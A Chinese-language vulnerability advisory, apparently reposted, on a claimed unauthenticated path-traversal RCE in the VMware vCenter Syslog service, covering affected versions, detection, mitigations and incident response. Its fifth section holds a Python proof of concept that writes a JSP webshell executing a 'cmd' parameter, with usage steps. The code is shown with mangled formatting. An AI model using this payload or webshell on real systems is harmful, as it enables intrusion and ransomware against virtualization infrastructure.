【高危漏洞预警】VMwarevCenterSyslog服务未授权目录遍历远程代码执行漏洞CVE-2026-59310

admin 2026-09-28 04:48:52 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: VMwarevCenterSyslog服务存在未授权目录遍历远程代码执行漏洞CVE-2026-59310,攻击者可构造恶意Syslog报文利用路径穿越写入webshell实现未授权RCE,影响vCenterServer8.0、9.0、9.1多个版本。建议优先升级补丁,收紧514端口访问控制,加强文件监控与日志审计,疑似入侵需立即断网并排查后门。 综合评分: 85 文章分类: 漏洞预警,应急响应,漏洞分析


【高危漏洞预警】VMware vCenter Syslog服务未授权目录遍历远程代码执行漏洞CVE-2026-59310

飓风网络安全

2026年9月27日 23:32 新疆

在小说阅读器读本章

去阅读

在公众号小说中沉浸阅读

一、漏洞描述

vCenter内置Syslog日志接收服务对传入日志报文内的路径参数校验存在缺陷。攻击者可构造特殊Syslog报文,利用../路径穿越字符,绕过目录限制,向服务器本地任意路径写入文件。

vCenter底层为Photon OS,攻击者通过写入JSP/Java代码到Web应用目录,访问该Web文件即可实现未授权远程代码执行。

攻击链路:

未授权网络访问 → 恶意Syslog报文发送 → 路径穿越写入webshell → Web访问触发代码执行 → 拿下vCenter管理员权限,横向控制ESXi集群。

攻击特点:无需账号密码、无用户交互、低复杂度,可自动化批量扫描利用,勒索团伙拿到vCenter权限后加密虚拟机、窃取虚拟化资产数据。

二、影响版本

• vCenter Server 8.0:早于 8.0 U3k

• vCenter Server 9.0:早于 9.0.2.0100

• vCenter Server 9.1:早于 9.1.0.0300

• 衍生产品:VMware Cloud Foundation、vSphere Foundation、Telco Cloud Platform 对应内嵌vCenter版本受影响

修复版本

升级至:

vCenter 8.0 U3k / 9.0.2.0100 / 9.1.0.0300 及以上版本

三、检测方法(企业自查)

  1. 版本自查

登录vCenter,查看版本号,匹配上述受影响清单。

  1. 端口探测

vCenter Syslog服务默认监听 UDP/TCP 514,部分环境启用TLS 6514。

若公网开放514端口,风险极高。

  1. 流量特征检测

• 源IP发送大量畸形syslog报文,报文内包含../路径穿越字符串

• 短时间内向vCenter写入陌生jsp文件

• 大量陌生Web访问请求,访问临时jsp文件

  1. 主机侧审计

Photon OS 检查 /var/log/vmware/、/usr/lib/vmware-vsphere-ui/server/work/deployer-sample/ 目录下新增jsp文件。

四、缓解方案(未打补丁临时防护)

  1. 网络隔离:ACL禁止公网访问vCenter 514/6514端口,仅可信内网日志源访问Syslog端口。

  2. 防火墙限制:仅允许已知日志采集服务器IP访问Syslog端口。

  3. 关闭不必要Syslog接收功能,不需要远程syslog采集则直接关闭该服务。

  4. 监控告警:新增文件写入告警,重点监控vCenter Web目录新增jsp文件。

  5. 优先升级补丁,临时防护仅过渡,不能完全替代官方补丁。

五、漏洞利用说明 & PoC

⚠️ 仅授权靶场环境使用,未经授权扫描、攻击属于违法。

原理:构造syslog报文,通过路径穿越将JSP Webshell写入vCenter Web目录,随后HTTP访问触发代码执行。

!/usr/bin/env python3

CVE-2026-59310 PoC (Only for authorized lab test)

VMware vCenter Syslog Directory Traversal -> Write JSP -> RCE

import socket

import sys

def send_syslog_payload(target_ip, target_port, payload_content):

Syslog报文头 + 路径穿越payload,写入vsphere-ui web目录

路径:../../usr/lib/vmware-vsphere-ui/server/work/deployer-sample/evil.jsp

syslog_msg = f”<13>Aug 28 10:00:00 test {payload_content}”

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.connect((target_ip, target_port))

sock.sendall(syslog_msg.encode())

sock.close()

print(“[+] Payload sent, try access https://{}/ui/evil.jsp”.format(target_ip))

if __name__ == “__main__”:

if len(sys.argv) != 2:

print(“Usage: python poc.py “)

sys.exit()

ip = sys.argv[1]

port = 514

JSP webshell payload

traversal_path = “../../usr/lib/vmware-vsphere-ui/server/work/deployer-sample/evil.jsp”

jsp_shell = ‘<%@page import="java.lang.Runtime"%><%Runtime.getRuntime().exec(request.getParameter("cmd"));%>‘

payload = f”FILE:{traversal_path}\n{jsp_shell}”

send_syslog_payload(ip, port, payload)

使用方式(靶场)

  1. 在隔离靶场部署受影响vCenter

  2. 执行脚本发送payload

  3. 浏览器访问 https://vcenter/ui/evil.jsp?cmd=id 执行系统命令

限制说明:不同vCenter版本Web部署目录存在差异,部分版本需要调整写入路径;TCP/UDP端口差异需要切换socket类型。

六、应急响应处置(如果疑似被入侵)

  1. 立即断开vCenter对外网络,防止横向扩散到ESXi主机

  2. 备份vCenter日志,取证:syslog服务日志、web访问日志、文件变更审计日志

  3. 查杀Web目录内jsp后门、恶意脚本

  4. 重置vCenter、ESXi所有管理员账号密码

  5. 排查虚拟机是否存在勒索加密、数据窃取

  6. 完成取证后,升级vCenter到修复版本,加固ACL策略

七、总结

CVE-2026-59310是高危未授权RCE漏洞,野外已经被勒索团伙利用。vCenter作为虚拟化集群核心管理节点,一旦被拿下,整个虚拟化平台全部受控。

建议运维:

  1. 优先梳理全网vCenter资产,确认版本

  2. 公网vCenter立即收紧514端口访问

  3. 尽快完成补丁升级,同步日志审计、文件监控能力


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。

本文转载自:飓风网络安全 《【高危漏洞预警】VMware vCenter Syslog服务未授权目录遍历远程代码执行漏洞CVE-2026-59310》

    评论:0   参与:  0